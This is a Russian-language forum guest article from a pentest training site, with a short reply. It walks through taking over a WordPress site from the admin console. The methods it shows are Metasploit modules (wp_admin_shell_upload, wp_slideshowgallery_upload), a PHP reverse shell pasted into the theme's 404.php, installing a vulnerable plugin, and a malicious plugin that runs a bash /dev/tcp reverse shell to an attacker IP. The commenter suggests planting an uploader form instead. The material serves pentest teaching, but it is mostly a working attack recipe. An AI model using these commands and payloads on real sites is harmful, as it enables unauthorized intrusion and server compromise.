• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Гостевая статья WordPress: Reverse Shell

Этот пост связан с тестированием безопасности WordPress для определения возможности использования WordPress путем компрометации консоли администратора.

Содержание
  • Metasploit Framework
  • Внедрение вредоносного кода в WP_Theme
  • Загрузить уязвимую WP_Pulgin
  • Внедрить вредоносный плагин
Требование:
Хост-машина: WordPress
Злоумышленник: Kali Linux
Учетные данные WordPress: admin: admin (в нашем случае)

Давайте начнем!!

Как вы можете заметить, у меня есть доступ к консоли администратора WordPress через веб-браузер, для получения веб-оболочки нам необходимо использовать эту CMS. Существует несколько способов использования WordPress, давайте перейдем к некоторым операциям.
1.png


Metasploit Framework

Самый первый метод, который у нас есть, - это Metasploit. Этот модуль принимает имя пользователя и пароль администратора, входит в административную панель и загружает полезные данные, упакованные в виде плагина WordPress. Поскольку это аутентифицированное выполнение кода по проекту, он должен работать на всех версиях WordPress и, как результат, он даст сеанс meterpreter веб-сервера.
Код:
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
Это срабатывает, и вы можете видеть, что у нас было обратное соединение с веб-сервером через сеанс meterpreter.
2.png


Внедрение вредоносного кода в WP_Theme

Есть также вторая техника, которая позволяет вам создавать оболочки веб-сервера. Если у вас есть имя пользователя и пароль для администратора, войдите в панель администратора и внедрите вредоносный код PHP в качестве темы WordPress.

3.png

Войдите в WP_dashboard и откройте вкладку appearance.
4.png

Теперь перейдите к теме twenty fifteen ь выбрав шаблон в 404.php
5.png

Вы видите текстовую область для редактирования шаблона, введите свой вредоносный php-код здесь, чтобы получить обратное соединение с веб-сервером.
6.1.png

6.png

Чтобы продолжить, мы использовали обратную оболочку PHP (By Penetstmonkey). А затем мы скопировали вышеупомянутый php-reverse-shell и вставили его в шаблон WordPress 404.php, как показано на рисунке ниже. Мы изменили IP-адрес на наш текущий IP-адрес и ввели любой порт, который вы хотите, и запустили прослушиватель netcat для получения обратного соединения.
7.png

Обновите файл и просмотрите следующий URL, чтобы запустить введенный код php.
http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php
8.png

У вас будет сеанс после выполнения файла 404.php. Для доступа к netcat используйте следующую команду:
9.png


Загрузить уязвимый WP_Plugin

Некоторым пользователям при входе в систему не предоставляется доступ для записи для внесения изменений в тему WordPress, поэтому мы выбираем «Внедрить WP Plugin вредонос» в качестве альтернативы стратегии получения веб-оболочки.

Таким образом, получив доступ к панели управления WordPress, вы можете попытаться установить вредоносный плагин. Здесь я уже скачал уязвимый плагин из exploit db.

Нажмите чтобы скачать плагин для практики.
10.png

Так как у нас есть zip-файл, и теперь пришло время загрузить плагин.

Dashboard > plugins > upload plugin

11.png

Просмотрите загруженный файл как показано.
12.png

Как только пакет будет успешно установлен, нам нужно активировать плагин.
13.png

Когда все хорошо настроено, тогда приступайте к эксплуатации. Так как мы установили уязвимый плагин с именем «reflex-gallery», и его легко использовать.

Вы воспользуетесь этой уязвимостью в среде Metasploit, загрузите модуль и выполните следующую команду:
Код:
use exploit/unix/webapp/wp_slideshowgallery_upload
set rhosts 192.168.1.101
set targeturi /wordpress
exploit
Поскольку вышеупомянутые команды будут выполнены, у вас будет получен сеанс meterpreter. Как показано в этой статье, существует несколько способов использования веб-сайта на платформе WordPress.
14.png


Внедрить вредоносный плагин

Как вы видели выше, мы загрузили уязвимый плагин, с доступным експлойтом. Но на этот раз мы собираемся внедрить наш сгенерированный вредоносный плагин для получения обратной оболочки.

Это довольно просто, поскольку мы сохранили вредоносный код для обратной оболочки внутри php-файла с именем «revshell.php» и сжали файл в формате zip.

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")
15.png

Повторите тот же шаг, что и выше, для загрузки файла плагина «revshell.zip» и запустите прослушиватель netcat, чтобы получить обратное соединение с целевой машиной.
16.png

Как только пакет будет успешно установлен, нам нужно активировать плагин.
17.png

Как только вы активируете плагин, он будет через обратное соединение как сеанс netcat.
18.png


Источник:
 
Последнее редактирование:

Sombrero

Green Team
23.09.2019
67
4
BIT
0
Да на фига там reverse-shell ? Лишние заморочки . Добавь в тему uploader form и готово .
Опять же для чего устанавливать уязвимый плагин , если есть возможность поставить какой-нибудь файловый редактор из официального репозитория ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!